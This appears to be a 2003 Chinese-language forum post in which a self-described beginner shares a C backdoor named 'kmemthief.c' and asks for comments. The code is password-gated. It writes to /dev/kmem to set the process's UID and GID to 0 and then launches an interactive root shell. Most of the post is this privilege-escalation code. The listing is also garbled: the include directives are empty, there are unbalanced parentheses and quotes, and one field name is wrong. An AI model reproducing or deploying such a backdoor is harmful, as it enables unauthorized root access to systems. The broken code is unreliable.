- 论坛徽章:
- 0
|
<++>; backdoor/kmemthief.c
#include
#include
#include
#include
#include
#include
#include
#define pass "triad"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to
/dev/kmem\n" ;
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n";
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n";
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n";
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
}
<-->;
我想这个程序通过在内存中寻找你所运行程序的 UID,并将其改为 0,这样你就有了一个 suid root shell 了。
我编的不好,请各位指教。
谢谢!
一个菜鸟入门的请教,希望您不要见笑 |
|
免费注册
发表于 2003-05-14 20:16